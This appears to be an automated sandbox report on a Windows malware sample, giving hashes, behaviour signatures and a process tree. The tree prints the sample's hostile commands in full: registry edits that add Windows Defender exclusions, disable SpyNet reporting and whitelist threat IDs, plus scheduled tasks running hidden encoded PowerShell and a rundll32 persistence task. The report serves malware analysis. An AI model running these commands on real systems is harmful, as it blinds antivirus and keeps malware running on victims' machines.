Analysis
-
max time kernel
151s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
23-11-2022 12:24
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
28ceb8d72ff0934b39e779a3b6f1c514
-
SHA1
c4731a619c179da43cc1f059e8693a88e9891bf4
-
SHA256
1d260f0670b9c7a24763540bbeadf520d7edd342bcbe9d08d2352cade2502720
-
SHA512
8966a7163f3af92671631558a3bfb6b353778f008334e0346d594a43cb07b9eb2742f80812a8a54cf863e77a9f755e0577e4a4e0c7d0b0ceb873fdbfe2fb0a1f
-
SSDEEP
98304:91OFjm0/1juHbR5cyCJUMlcCOAndwmVXUBNECTb3z9Ob0sSmPFSVlCfdD+0Wvad8:91OFjx9jORHCuiUedHRKuNJNdRX0uXgJ
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 29 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS540.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSE19.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giGpJUrHU" /SC once /ST 07:55:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giGpJUrHU"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giGpJUrHU"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bPisEBnRwoxYOmuHrm" /SC once /ST 13:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\WaGVnmO.exe\" mF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\WaGVnmO.exeC:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\WaGVnmO.exe mF /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gUXCkMfuWzCyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gUXCkMfuWzCyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gcyASImYjZBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gcyASImYjZBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vCYWhmhlU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vCYWhmhlU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yqOJJFIvHNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yqOJJFIvHNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QtEKgGNERTHTknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QtEKgGNERTHTknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LzrOtnkAyuDpOCzW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LzrOtnkAyuDpOCzW\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gUXCkMfuWzCyC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gUXCkMfuWzCyC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gcyASImYjZBU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gcyASImYjZBU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCYWhmhlU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCYWhmhlU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yqOJJFIvHNUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yqOJJFIvHNUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QtEKgGNERTHTknVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QtEKgGNERTHTknVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LzrOtnkAyuDpOCzW /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LzrOtnkAyuDpOCzW /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOVfgYpaG" /SC once /ST 11:19:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOVfgYpaG"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOVfgYpaG"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ehnYTuGzyhWqfGFsn" /SC once /ST 07:24:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\apHgcpf.exe\" 4c /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ehnYTuGzyhWqfGFsn"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\apHgcpf.exeC:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\apHgcpf.exe 4c /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bPisEBnRwoxYOmuHrm"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\vCYWhmhlU\ytnWjB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ulJHerdNyNJKzGw" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
